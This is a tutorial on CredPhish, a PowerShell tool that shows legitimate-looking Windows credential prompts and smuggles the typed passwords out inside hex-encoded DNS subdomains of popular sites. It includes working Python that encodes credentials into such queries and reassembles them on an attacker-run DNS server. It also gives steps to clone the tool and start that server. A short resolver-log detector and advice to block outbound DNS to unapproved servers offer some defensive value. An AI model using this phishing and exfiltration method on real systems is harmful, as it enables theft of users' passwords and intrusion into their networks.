Exfiltrate Passwords – Prompting the user for credentials is an effective way to elevate privileges and move laterally. Password prompts from Outlook, VPN clients and other authentication components appear seemingly at random in a Windows environment, so users are conditioned to fill them in without much thought. The attacker uses built-in Windows and PowerShell functionality to pop up a legitimate-looking credential prompt and retrieve the user's password.
What is CredPhish?
CredPhish is a PowerShell script for invoking legitimate credential prompts and exfiltrating the captured passwords over DNS. It relies on the Windows CredentialPicker API to collect user passwords, PowerShell's built-in Resolve-DnsName cmdlet for DNS exfiltration, and Windows Defender's ConfigSecurityPolicy.exe to perform arbitrary GET requests.
By default, CredPhish uses Resolve-DnsName (PowerShell's built-in DNS resolver) to exfiltrate credentials. It converts each character of the credential to its hexadecimal value, splits the resulting hex string into fixed-size chunks, and places each chunk in the subdomain of a popular website, so the queries blend in with ordinary lookups. The following screenshot shows an example of exfiltrated credentials in hexadecimal form. Note the hex encoding of "tokyoneon" (746f6b796f6e656f6e) in the subdomains of google.com and office.com.
Before resolving the query, the attacker's DNS server strips the hexadecimal subdomain, so the carrier domain resolves normally instead of producing dozens of NXDOMAIN errors on the victim. Note that in the Wireshark screenshot below the "Answer" field no longer contains the subdomain and correctly resolves to one of Google's IP addresses. For defenders the weak point is that the victim's queries must reach the attacker-run DNS server rather than the corporate resolver: outbound DNS to unapproved servers, and long all-hex labels under well-known domains, are the things to block or alert on.
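As an added illustration (not CredPhish's own code, which this page does not show), the Python below implements the encoding just described, the receiver-side stripping of the hex label before the carrier domain is resolved, and a simple detector a defender could run over resolver logs to spot the pattern. The carrier domains, the chunk size, the two-hex-digit sequence prefix on each label and the resolver log lines are all constructed assumptions for this example; CredPhish's own chunk sizes and query layout may differ.

```python
"""Hex-over-DNS credential exfiltration: sender encoding, receiver decoding
and a resolver-log detector. Added example, not CredPhish's own code."""
from __future__ import annotations

import re
from typing import Iterable

# Constructed parameters (assumptions, not taken from CredPhish):
CARRIER_DOMAINS = ("google.com", "office.com", "microsoft.com")
CHUNK_HEX = 8  # hex characters (4 credential bytes) per subdomain label

# A label we treat as a carrier: even-length lowercase hex of at least 4 chars
# (2-char sequence prefix plus at least one encoded byte).
HEX_LABEL = re.compile(r"(?:[0-9a-f]{2}){2,}")


def encode_queries(credential: str, domains=CARRIER_DOMAINS, chunk=CHUNK_HEX) -> list[str]:
    """Sender side: hex-encode the credential, cut the hex string into
    fixed-size chunks and put each chunk in the leftmost label of a rotating
    carrier domain. The two-hex-digit sequence prefix is our addition so the
    receiver can reorder queries that arrive out of order; the page does not
    say CredPhish does this."""
    hexed = credential.encode("utf-8").hex()
    chunks = [hexed[i:i + chunk] for i in range(0, len(hexed), chunk)]
    if len(chunks) > 0xFF:
        raise ValueError("credential too long for a one-byte sequence number")
    return [f"{seq:02x}{part}.{domains[seq % len(domains)]}"
            for seq, part in enumerate(chunks)]


def strip_label(qname: str) -> tuple[str | None, str]:
    """Receiver side: split '00746f6b79.google.com' into the hex label and the
    carrier name the server should really resolve. A non-hex leading label
    ('www.google.com') comes back as (None, qname) so ordinary queries are
    forwarded untouched and the client never sees an NXDOMAIN."""
    first, _, rest = qname.lower().rstrip(".").partition(".")
    if rest and HEX_LABEL.fullmatch(first):
        return first, rest
    return None, qname


def decode_queries(qnames: Iterable[str]) -> str:
    """Reassemble the credential from the hex labels of observed queries in
    sequence-number order, ignoring unrelated queries mixed in."""
    labels = [label for label, _ in map(strip_label, qnames) if label]
    labels.sort(key=lambda label: int(label[:2], 16))
    return bytes.fromhex("".join(label[2:] for label in labels)).decode("utf-8")


# Constructed resolver log (timestamp, client, queried name); not a real capture.
SAMPLE_LOG = """\
2024-05-01T10:00:01Z 10.0.0.5 00746f6b79.google.com
2024-05-01T10:00:01Z 10.0.0.7 www.google.com
2024-05-01T10:00:02Z 10.0.0.5 016f6e656f.office.com
2024-05-01T10:00:02Z 10.0.0.7 mail.office.com
2024-05-01T10:00:03Z 10.0.0.5 026e.microsoft.com
"""


def flag_hex_subdomains(log_text: str) -> dict[str, list[str]]:
    """Detector: group queried names whose leftmost label is pure hex by client.
    Real hosts rarely carry such labels under big-brand domains, so a client
    emitting several within seconds deserves a look. Expect some noise (a host
    literally named 'cafe' matches), so treat hits as hunting leads, not verdicts."""
    hits: dict[str, list[str]] = {}
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _ts, client, qname = line.split()
        label, _carrier = strip_label(qname)
        if label:
            hits.setdefault(client, []).append(qname)
    return hits


if __name__ == "__main__":
    queries = encode_queries("tokyoneon")
    print(queries)  # leftmost labels carry 746f6b79, 6f6e656f and 6e
    print(decode_queries(reversed(queries)))
    for client, names in flag_hex_subdomains(SAMPLE_LOG).items():
        print(client, "->", decode_queries(names))
```

The detector reuses the same label test the receiver uses, which is the point: the attacker's DNS server can only strip what is unambiguously its own encoding, so the defender can match on exactly the same property. Sorting by a sequence prefix rather than trusting arrival order matters in practice because UDP queries from a busy host do not always reach the server in the order they were sent.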
How to download and run the CredPhish password exfiltration tool
Step 1:
First, clone the CredPhish repository from GitHub with the command below:
git clone https://github.com/tokyoneon/CredPhish.git
Step 2:
Now change into the CredPhish directory:
cd CredPhish
Step 3:
Start the Python DNS server that receives the passwords exfiltrated over DNS. It needs root to bind the DNS port, hence sudo:
sudo ./dns_server.py
The PowerShell side of CredPhish is then run on the target Windows host; its DNS queries have to reach this server for the password to be recovered.